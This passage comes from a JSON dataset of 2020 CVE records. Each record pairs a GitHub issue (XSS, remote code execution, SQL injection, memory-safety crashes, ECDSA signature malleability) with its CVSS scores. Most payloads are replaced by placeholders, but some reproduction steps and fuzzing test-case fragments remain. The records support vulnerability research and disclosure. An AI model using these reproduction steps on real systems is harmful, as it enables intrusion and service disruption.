  47822. "description": "Lack of encoding checks allows a certain degree of signature malleability in ECDSA signatures . Hello, Using elliptic NUMBERTAG I've found that the ECDSA verification functionality validates signatures as 'true' when the encoding is incorrect i.e. it has been modified / altered against the standard, allowing a certain degree of malleability in the signatures. Based on the Google Wycheproof test vectors, the following changes on an ECDSA signature are not detected: \"long form encoding of length of sequence\", \"length of sequence contains leading NUMBERTAG length of integer contains leading NUMBERTAG uint NUMBERTAG overflow in length of integer\", \"uint NUMBERTAG overflow in length of integer\", \"prepending NUMBERTAG s to integer\", \"long form encoding of length of integer\" See the proof of concept and test vectors below: ERRORTAG Test vectors: ERRORTAG",
  47823. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L",
  47824. "severity": "HIGH",
  47825. "baseScore": 7.7,
  47826. "impactScore": 5.5,
  47827. "exploitabilityScore": 2.2
  47828. },
  47829. {
  47830. "CVE_ID": "CVE-2020-13848",
  47831. "Issue_Url_old": "https://github.com/pupnp/pupnp/issues/177",
  47832. "Issue_Url_new": "https://github.com/pupnp/pupnp/issues/177",
  47833. "Repo_new": "pupnp/pupnp",
  47834. "Issue_Created_At": "2020-06-02T08:54:59Z",
  47835. "description": "NULL pointer dereference in APITAG There is a NULL pointer dereference in the function APITAG in PATHTAG A segmentation fault occurs if the string APITAG is NULL. This crash can be triggered by sending a malformed SUBSCRIBE or UNSUBSCRIBE using any of the attached files. ERRORTAG This will result in the following output using subscribe ERRORTAG and using unsubscribe ERRORTAG This was tested on the current master branch and on release NUMBERTAG Earlier versions may also be affected. FILETAG FILETAG",
  47836. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47837. "severity": "HIGH",
  47838. "baseScore": 7.5,
  47839. "impactScore": 3.6,
  47840. "exploitabilityScore": 3.9
  47841. },
  47842. {
  47843. "CVE_ID": "CVE-2020-13881",
  47844. "Issue_Url_old": "https://github.com/kravietz/pam_tacplus/issues/149",
  47845. "Issue_Url_new": "https://github.com/kravietz/pam_tacplus/issues/149",
  47846. "Repo_new": "kravietz/pam_tacplus",
  47847. "Issue_Created_At": "2020-06-02T16:40:38Z",
  47848. "description": "Printing server secret key in plain text in journalctl. In the example, we can see that server secret key is printed in plain text in journalctl logs. If an attacker is using man in the middle attack and somehow gets these logs, he/she can decrypt and see all packets. User passwords will also be exposed by that.",
  47849. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47850. "severity": "HIGH",
  47851. "baseScore": 7.5,
  47852. "impactScore": 3.6,
  47853. "exploitabilityScore": 3.9
  47854. },
  47855. {
  47856. "CVE_ID": "CVE-2020-13889",
  47857. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1205",
  47858. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1205",
  47859. "Repo_new": "bludit/bludit",
  47860. "Issue_Created_At": "2020-06-05T01:31:12Z",
  47861. "description": "Possible XSS and HTML injection on admin page.. Hello I think I found a vulnerability. This vulnerability consists in a function called APITAG in the administration panel of bludit,that when accessed in DOM, allows users define the text to be popped up in the message box. But this function dont have any sanatization and the user can inject any javascript and html code in the page the payload used was: APITAG APITAG \"); FILETAG The versions that i tested was the Bludit NUMBERTAG I'll check the old ones for a more in deep report Thank you.",
  47862. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47863. "severity": "MEDIUM",
  47864. "baseScore": 5.4,
  47865. "impactScore": 2.7,
  47866. "exploitabilityScore": 2.3
  47867. },
  47868. {
  47869. "CVE_ID": "CVE-2020-13895",
  47870. "Issue_Url_old": "https://github.com/FGasper/p5-Crypt-Perl/issues/14",
  47871. "Issue_Url_new": "https://github.com/fgasper/p5-crypt-perl/issues/14",
  47872. "Repo_new": "fgasper/p5-crypt-perl",
  47873. "Issue_Created_At": "2020-06-04T10:07:35Z",
  47874. "description": "APITAG fails to verify ECDSA signatures when r and s are small and when s NUMBERTAG Hello, I'm using APITAG NUMBERTAG ERRORTAG When using the following test vectors with small r, s and s NUMBERTAG from Google Wycheproof: ERRORTAG with the prime NUMBERTAG curve, I'm getting this output: ERRORTAG which can be verified with this proof of concept: ERRORTAG Best regards, Antonio",
  47875. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  47876. "severity": "HIGH",
  47877. "baseScore": 8.8,
  47878. "impactScore": 5.9,
  47879. "exploitabilityScore": 2.8
  47880. },
  47881. {
  47882. "CVE_ID": "CVE-2020-13962",
  47883. "Issue_Url_old": "https://github.com/mumble-voip/mumble/issues/3679",
  47884. "Issue_Url_new": "https://github.com/mumble-voip/mumble/issues/3679",
  47885. "Repo_new": "mumble-voip/mumble",
  47886. "Issue_Created_At": "2019-04-29T14:36:34Z",
  47887. "description": "Connection drops with Qt NUMBERTAG SSL_shutdown:shutdown while in init). Since upgrading to Qt NUMBERTAG all clients get a disconnect after about NUMBERTAG minutes of connection time. Reproducible with Qt NUMBERTAG und Qt NUMBERTAG downgrading to NUMBERTAG solves this issue. Not sure if this is a Qt bug or not, so I'm reporting it here first, alto it looks like a bug in Qt. FILETAG",
  47888. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47889. "severity": "HIGH",
  47890. "baseScore": 7.5,
  47891. "impactScore": 3.6,
  47892. "exploitabilityScore": 3.9
  47893. },
  47894. {
  47895. "CVE_ID": "CVE-2020-13978",
  47896. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/464",
  47897. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/464",
  47898. "Repo_new": "monstra-cms/monstra",
  47899. "Issue_Created_At": "2020-05-22T18:06:25Z",
  47900. "description": "Remote Code Execution via Theme module. Describe the bug An attacker could insert any executable code through php via Theme Module to execution command in the server To Reproduce Log into the panel. Go to PATHTAG Click edit Insert payload APITAG Go to index view FILETAG FILETAG",
  47901. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  47902. "severity": "HIGH",
  47903. "baseScore": 7.2,
  47904. "impactScore": 5.9,
  47905. "exploitabilityScore": 1.2
  47906. },
  47907. {
  47908. "CVE_ID": "CVE-2020-13980",
  47909. "Issue_Url_old": "https://github.com/opencart/opencart/issues/7974",
  47910. "Issue_Url_new": "https://github.com/opencart/opencart/issues/7974",
  47911. "Repo_new": "opencart/opencart",
  47912. "Issue_Created_At": "2020-05-31T16:35:45Z",
  47913. "description": "Store XSS Vulnerability in Opencart NUMBERTAG Upload Images. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the Upload Images To Reproduce Steps to reproduce the behavior NUMBERTAG Go to Profile NUMBERTAG Change name of images in local computer to \"> APITAG .png NUMBERTAG Click upload a images NUMBERTAG Click Upload image with payload in name to server NUMBERTAG See result popup XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots / Screen recordings Link video POC: URLTAG Server / Test environment (please complete the following information): OS: Linux Browser: All Version NUMBERTAG",
  47914. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  47915. "severity": "MEDIUM",
  47916. "baseScore": 4.8,
  47917. "impactScore": 2.7,
  47918. "exploitabilityScore": 1.7
  47919. },
  47920. {
  47921. "CVE_ID": "CVE-2020-13991",
  47922. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3860",
  47923. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3860",
  47924. "Repo_new": "jerryscript-project/jerryscript",
  47925. "Issue_Created_At": "2020-06-05T03:46:21Z",
  47926. "description": "SIGABRT in jerry_port_fatal . APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS Build steps python tools/build.py profile=es NUMBERTAG subset lto=off error messages=on strip=off compile flag= fsanitize=address Test case function APITAG { const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG let NUMBERTAG const NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG APITAG let NUMBERTAG while NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG APITAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG get:gc,set:gc}; const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG species\"]; const NUMBERTAG constructor NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG let NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG const NUMBERTAG let NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG const NUMBERTAG let NUMBERTAG do { let NUMBERTAG try { const NUMBERTAG APITAG } catch NUMBERTAG const NUMBERTAG typeof NUMBERTAG const NUMBERTAG number\"; let NUMBERTAG while NUMBERTAG APITAG Execution steps PATHTAG FILETAG Output Program received signal SIGABRT, Aborted. Backtrace Program received signal SIGABRT, Aborted. __GI_raise (sig=sig APITAG at PATHTAG (gdb) bt NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff6e NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ac NUMBERTAG in jerry_port_fatal NUMBERTAG beef in jerry_fatal NUMBERTAG f NUMBERTAG d3 in ecma_ref_object NUMBERTAG cd in ecma_copy_value NUMBERTAG cf7c in vm_loop NUMBERTAG b5f6 in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG in ecma_op_function_call_simple NUMBERTAG f2d6 in ecma_op_function_call NUMBERTAG b9aa in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG e in jerry_run NUMBERTAG f NUMBERTAG df in main ()",
  47927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47928. "severity": "HIGH",
  47929. "baseScore": 7.5,
  47930. "impactScore": 3.6,
  47931. "exploitabilityScore": 3.9
  47932. },
  47933. {
  47934. "CVE_ID": "CVE-2020-13991",
  47935. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3858",
  47936. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3858",
  47937. "Repo_new": "jerryscript-project/jerryscript",
  47938. "Issue_Created_At": "2020-06-05T03:38:44Z",
  47939. "description": "SEGV in ecma_deref_ecma_string. APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS Build steps python tools/build.py profile=es NUMBERTAG subset lto=off error messages=on strip=off compile flag= fsanitize=address Test case function APITAG { const NUMBERTAG const NUMBERTAG const NUMBERTAG species\"; function NUMBERTAG const NUMBERTAG return NUMBERTAG const NUMBERTAG APITAG \"species NUMBERTAG let NUMBERTAG while NUMBERTAG const NUMBERTAG APITAG } const NUMBERTAG species NUMBERTAG const NUMBERTAG let NUMBERTAG if NUMBERTAG const NUMBERTAG set NUMBERTAG const NUMBERTAG APITAG } else NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG const NUMBERTAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG let NUMBERTAG let NUMBERTAG while NUMBERTAG let NUMBERTAG gc; APITAG NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG Symbol NUMBERTAG const NUMBERTAG APITAG } APITAG Execution steps PATHTAG FILETAG Output APITAG Backtrace Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffd0c in ecma_deref_ecma_string () (gdb) bt NUMBERTAG ffd0c in ecma_deref_ecma_string NUMBERTAG a NUMBERTAG bb in opfunc_spread_arguments NUMBERTAG in vm_loop NUMBERTAG b5f6 in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG in ecma_op_function_call_simple NUMBERTAG f2d6 in ecma_op_function_call NUMBERTAG b9aa in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG e in jerry_run NUMBERTAG f NUMBERTAG df in main ().",
  47940. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47941. "severity": "HIGH",
  47942. "baseScore": 7.5,
  47943. "impactScore": 3.6,
  47944. "exploitabilityScore": 3.9
  47945. },
  47946. {
  47947. "CVE_ID": "CVE-2020-13991",
  47948. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3859",
  47949. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3859",
  47950. "Repo_new": "jerryscript-project/jerryscript",
  47951. "Issue_Created_At": "2020-06-05T03:41:34Z",
  47952. "description": "SEGV in jmem_pools_finalize . APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS Build steps python tools/build.py profile=es NUMBERTAG subset lto=off error messages=on strip=off compile flag= fsanitize=address Test case function APITAG { const NUMBERTAG APITAG const NUMBERTAG APITAG let NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG gc; const NUMBERTAG APITAG } APITAG Execution steps PATHTAG FILETAG Output APITAG Backtrace Program received signal SIGSEGV, Segmentation fault NUMBERTAG bd5f in jmem_pools_finalize () (gdb) bt NUMBERTAG bd5f in jmem_pools_finalize NUMBERTAG a7bb in jmem_finalize NUMBERTAG f2ba0 in main ()",
  47953. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47954. "severity": "HIGH",
  47955. "baseScore": 7.5,
  47956. "impactScore": 3.6,
  47957. "exploitabilityScore": 3.9
  47958. },
  47959. {
  47960. "CVE_ID": "CVE-2020-14012",
  47961. "Issue_Url_old": "https://github.com/osTicket/osTicket/issues/5514",
  47962. "Issue_Url_new": "https://github.com/osticket/osticket/issues/5514",
  47963. "Repo_new": "osticket/osticket",
  47964. "Issue_Created_At": "2020-05-21T10:01:21Z",
  47965. "description": "Cross Site Scripting Vulnerability on APITAG feature in APITAG Description: A authenticated malicious user can take advantage of a Reflected XSS vulnerability in the APITAG feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". OS: firefox Steps to Reproduce NUMBERTAG Log into the panel APITAG NUMBERTAG Go to PATHTAG NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG New Category NUMBERTAG Insert payload to Category Name or Category Description: \"> APITAG Expected behavior: FILETAG",
  47966. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47967. "severity": "MEDIUM",
  47968. "baseScore": 5.4,
  47969. "impactScore": 2.7,
  47970. "exploitabilityScore": 2.3
  47971. },
  47972. {
  47973. "CVE_ID": "CVE-2020-14042",
  47974. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1122",
  47975. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1122",
  47976. "Repo_new": "codiad/codiad",
  47977. "Issue_Created_At": "2020-06-03T15:02:11Z",
  47978. "description": "Multiple vulnerabilities that can result in RCE. Hello, Our research team in Checkmarx found multiple vulnerabilities in Codiad (XSS, CSRF, SSRF, RCE), we tried to contact the top three maintainers and none of them are active. If there are any active developers on this project feel free to contact us for more information. EMAILTAG Best regards, Yaniv.",
  47979. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47980. "severity": "MEDIUM",
  47981. "baseScore": 6.1,
  47982. "impactScore": 2.7,
  47983. "exploitabilityScore": 2.8
  47984. },
  47985. {
  47986. "CVE_ID": "CVE-2020-14060",
  47987. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2688",
  47988. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2688",
  47989. "Repo_new": "fasterxml/jackson-databind",
  47990. "Issue_Created_At": "2020-04-16T15:11:49Z",
  47991. "description": "Block one more gadget type ( ). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): Topsec(tcc) from Alphalab Security Team Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  47992. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47993. "severity": "HIGH",
  47994. "baseScore": 8.1,
  47995. "impactScore": 5.9,
  47996. "exploitabilityScore": 2.2
  47997. },
  47998. {
  47999. "CVE_ID": "CVE-2020-14061",
  48000. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2698",
  48001. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2698",
  48002. "Repo_new": "fasterxml/jackson-databind",
  48003. "Issue_Created_At": "2020-04-25T02:27:29Z",
  48004. "description": "Block one more gadget type (aqjms). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): Fangrun Li APITAG Security Team at Qihoo NUMBERTAG Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  48005. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48006. "severity": "HIGH",
  48007. "baseScore": 8.1,
  48008. "impactScore": 5.9,
  48009. "exploitabilityScore": 2.2
  48010. },
  48011. {
  48012. "CVE_ID": "CVE-2020-14062",
  48013. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2704",
  48014. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2704",
  48015. "Repo_new": "fasterxml/jackson-databind",
  48016. "Issue_Created_At": "2020-04-30T00:43:03Z",
  48017. "description": "Block one more gadget type ( ). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): APITAG from Security Team of Alibaba Cloud Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  48018. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48019. "severity": "HIGH",
  48020. "baseScore": 8.1,
  48021. "impactScore": 5.9,
  48022. "exploitabilityScore": 2.2
  48023. },
  48024. {
  48025. "CVE_ID": "CVE-2020-14148",
  48026. "Issue_Url_old": "https://github.com/ngircd/ngircd/issues/277",
  48027. "Issue_Url_new": "https://github.com/ngircd/ngircd/issues/277",
  48028. "Repo_new": "ngircd/ngircd",
  48029. "Issue_Created_At": "2020-05-12T18:35:15Z",
  48030. "description": "APITAG out of bounds index access (AFL + libdislocate). I have found an out of bounds error by fuzzing ngircd using AFL and libdislocate (a custom memory allocator). APITAG is called with APITAG which leads to a crash when accessing APITAG . The binary is built from APITAG with patches to fi NUMBERTAG and NUMBERTAG and APITAG patched into APITAG in order to support APITAG . Build flags: ./configure without syslog CC=afl clang fast Run mode: ngircd n f PATHTAG Input ( FILETAG : CODETAG Stacktrace: ERRORTAG",
  48031. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48032. "severity": "HIGH",
  48033. "baseScore": 7.5,
  48034. "impactScore": 3.6,
  48035. "exploitabilityScore": 3.9
  48036. },
  48037. {
  48038. "CVE_ID": "CVE-2020-14148",
  48039. "Issue_Url_old": "https://github.com/ngircd/ngircd/issues/274",
  48040. "Issue_Url_new": "https://github.com/ngircd/ngircd/issues/274",
  48041. "Repo_new": "ngircd/ngircd",
  48042. "Issue_Created_At": "2020-05-10T16:39:55Z",
  48043. "description": "iconv related crash (AFL). I have been fuzzing ngircd using AFL a bit, based on inputs that are used in the testsuite. AFL has found input that can be used to crash a server that has been built with APITAG . My current hypothis is that the crash happens because the APITAG context that is passed into iconv is invalid (i.e. has not been been initialized at all using APITAG ). Build flags: APITAG Run mode: APITAG Input ( FILETAG : APITAG Stacktrace: CODETAG",
  48044. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48045. "severity": "HIGH",
  48046. "baseScore": 7.5,
  48047. "impactScore": 3.6,
  48048. "exploitabilityScore": 3.9
  48049. },
  48050. {
  48051. "CVE_ID": "CVE-2020-14149",
  48052. "Issue_Url_old": "https://github.com/troglobit/uftpd/issues/30",
  48053. "Issue_Url_new": "https://github.com/troglobit/uftpd/issues/30",
  48054. "Repo_new": "troglobit/uftpd",
  48055. "Issue_Created_At": "2020-05-21T14:54:52Z",
  48056. "description": "Null Pointer Dereference / Crash. Hi! I found a bug that crashes the forked child pre authenticated. The details are as follows: Triggering the Bug ERRORTAG output of GDB session attached to APITAG : ERRORTAG registers CODETAG rdi is NUMBERTAG the stack trace is as follows: CODETAG the relevant source code in APITAG CODETAG APITAG so dir might be NULL but will be used in the APITAG macro with a call to APITAG . As can be seen from the stack trace APITAG and is APITAG at this point which causes the crash. To force APITAG we can look at APITAG in APITAG which calls APITAG here APITAG and APITAG returns the pointer at the end of the function: CODETAG So we have to look at APITAG in APITAG . The trace that leads to APITAG is the following: CODETAG Best Martin",
  48057. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48058. "severity": "HIGH",
  48059. "baseScore": 7.5,
  48060. "impactScore": 3.6,
  48061. "exploitabilityScore": 3.9
  48062. },
  48063. {
  48064. "CVE_ID": "CVE-2020-14153",
  48065. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445",
  48066. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445",
  48067. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  48068. "Issue_Created_At": "2020-07-27T14:47:40Z",
  48069. "description": "Is CVETAG present in libjpeg turbo?. URLTAG URLTAG My best guess is that this is fixed in the following change in jpeg NUMBERTAG d: CODETAG Is this any vulnerability that is or was present in libjpeg turbo?",
  48070. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  48071. "severity": "HIGH",
  48072. "baseScore": 7.1,
  48073. "impactScore": 5.2,
  48074. "exploitabilityScore": 1.8
  48075. },
  48076. {
  48077. "CVE_ID": "CVE-2020-14163",
  48078. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3804",
  48079. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3804",
  48080. "Repo_new": "jerryscript-project/jerryscript",
  48081. "Issue_Created_At": "2020-05-27T18:29:22Z",
  48082. "description": "Memory corruption in ecma_gc_set_object_visited ( PATHTAG ). APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG and APITAG Mac OS X APITAG NUMBERTAG APITAG NUMBERTAG E NUMBERTAG Build steps CODETAG ERRORTAG Test case to reproduce the bug for this APITAG keep the same filename length and run the interpreter providing the basename only, as in the Execution steps below. filename: APITAG ERRORTAG Execution steps ERRORTAG ERRORTAG Backtrace ERRORTAG",
  48083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  48084. "severity": "HIGH",
  48085. "baseScore": 7.5,
  48086. "impactScore": 3.6,
  48087. "exploitabilityScore": 3.9
  48088. },
  48089. {
  48090. "CVE_ID": "CVE-2020-14195",
  48091. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2765",
  48092. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2765",
  48093. "Repo_new": "fasterxml/jackson-databind",
  48094. "Issue_Created_At": "2020-06-13T23:22:50Z",
  48095. "description": "Block one more gadget type ( ). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): Al1ex MENTIONTAG Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  48096. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48097. "severity": "HIGH",
  48098. "baseScore": 8.1,
  48099. "impactScore": 5.9,
  48100. "exploitabilityScore": 2.2
  48101. },
  48102. {
  48103. "CVE_ID": "CVE-2020-14295",
  48104. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3622",
  48105. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3622",
  48106. "Repo_new": "cacti/cacti",
  48107. "Issue_Created_At": "2020-06-17T07:02:46Z",
  48108. "description": "FILETAG Expected behavior change the following lines : URLTAG CODETAG You should do APITAG instead of '%\" . get_request_var('filter') . \"%. Additional context As the application accept stacked queries, this can easy lead to remote code execution by replacing the path_php_binary setting inside the database. ERRORTAG Then call APITAG and get the shell_exec called with the path_php_binary. FILETAG",
  48109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  48110. "severity": "HIGH",
  48111. "baseScore": 7.2,
  48112. "impactScore": 5.9,
  48113. "exploitabilityScore": 1.2
  48114. },
  48115. {
  48116. "CVE_ID": "CVE-2020-14330",
  48117. "Issue_Url_old": "https://github.com/ansible/ansible/issues/68400",
  48118. "Issue_Url_new": "https://github.com/ansible/ansible/issues/68400",
  48119. "Repo_new": "ansible/ansible",
  48120. "Issue_Created_At": "2020-03-23T11:01:05Z",
  48121. "description": "uri module set string with masked content into content and json output. SUMMARY uri module set string with masked content into content and json output ISSUE TYPE Bug Report COMPONENT NAME uri ANSIBLE VERSION ERRORTAG CONFIGURATION APITAG OS / ENVIRONMENT STEPS TO REPRODUCE yaml hosts: localhost connection: local tasks: name: send request uri: url: \" URLTAG \" user: admin password: admin method: GET force_basic_auth: yes return_content: yes status_code NUMBERTAG register: response name: extract value vars: query: APITAG set_fact: value_content: \"{{ APITAG }}\" value_content_parsed: \"{{ APITAG | from_json | json_query(query) }}\" value_json: \"{{ APITAG }}\" name: debug debug: msg: \"{{ 'something with admin' in value_json }}\" \"{{ 'something with admin' in value_content }}\" \"{{ 'something with admin' in value_content_parsed }}\" \"{{ 'something with ' in value_json }}\" \"{{ 'something with ' in value_content }}\" \"{{ 'something with ' in value_content_parsed }}\" EXPECTED RESULTS The module should return the json/content value with the correct values ACTUAL RESULTS The module seems to apply sensitive info masking (' ') to value matching username/password in its output APITAG",
  48122. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  48123. "severity": "MEDIUM",
  48124. "baseScore": 5.5,
  48125. "impactScore": 3.6,
  48126. "exploitabilityScore": 1.8
  48127. },
  48128. {
  48129. "CVE_ID": "CVE-2020-14408",
  48130. "Issue_Url_old": "https://github.com/agentejo/cockpit/issues/1310",
  48131. "Issue_Url_new": "https://github.com/agentejo/cockpit/issues/1310",
  48132. "Repo_new": "agentejo/cockpit",
  48133. "Issue_Created_At": "2020-06-17T11:03:12Z",
  48134. "description": "Reflected XSS in login panel. Insufficient sanitization of to parameter in APITAG route allows for injection of arbitrary APITAG code into webpage content creating a reflected XSS attack vector. See below POC : APITAG",
  48135. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48136. "severity": "MEDIUM",
  48137. "baseScore": 6.1,
  48138. "impactScore": 2.7,
  48139. "exploitabilityScore": 2.8
  48140. },
  48141. {
  48142. "CVE_ID": "CVE-2020-14462",
  48143. "Issue_Url_old": "https://github.com/mitre/caldera/issues/1755",
  48144. "Issue_Url_new": "https://github.com/mitre/caldera/issues/1755",
  48145. "Repo_new": "mitre/caldera",
  48146. "Issue_Created_At": "2020-06-15T13:33:47Z",
  48147. "description": "FILETAG I have no idea if you guys are interested in that type of vulnerability but i thought it would be nice to inform you anyway :) ! Have a good day, Defte",
  48148. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  48149. "severity": "MEDIUM",
  48150. "baseScore": 5.4,
  48151. "impactScore": 2.7,
  48152. "exploitabilityScore": 2.3
  48153. },
  48154. {
  48155. "CVE_ID": "CVE-2020-14470",
  48156. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6438",
  48157. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6438",
  48158. "Repo_new": "octopusdeploy/issues",
  48159. "Issue_Created_At": "2020-06-19T04:37:00Z",
  48160. "description": "Helm chart download can leak feed password. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description In certain circumstances, downloading a package from the helm feed can leak the feed password to a deployment log. This means that an authenticated user could see a password that they would potentially not be authorized to view. Affected versions Octopus Server NUMBERTAG APITAG Mitigation Not a lot of good options here: Upgrade to APITAG rotate feed passwords on a regular basis Workarounds None known.",
  48161. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  48162. "severity": "MEDIUM",
  48163. "baseScore": 6.5,
  48164. "impactScore": 3.6,
  48165. "exploitabilityScore": 2.8
  48166. },
  48167. {
  48168. "CVE_ID": "CVE-2020-14927",
  48169. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/19",
  48170. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/19",
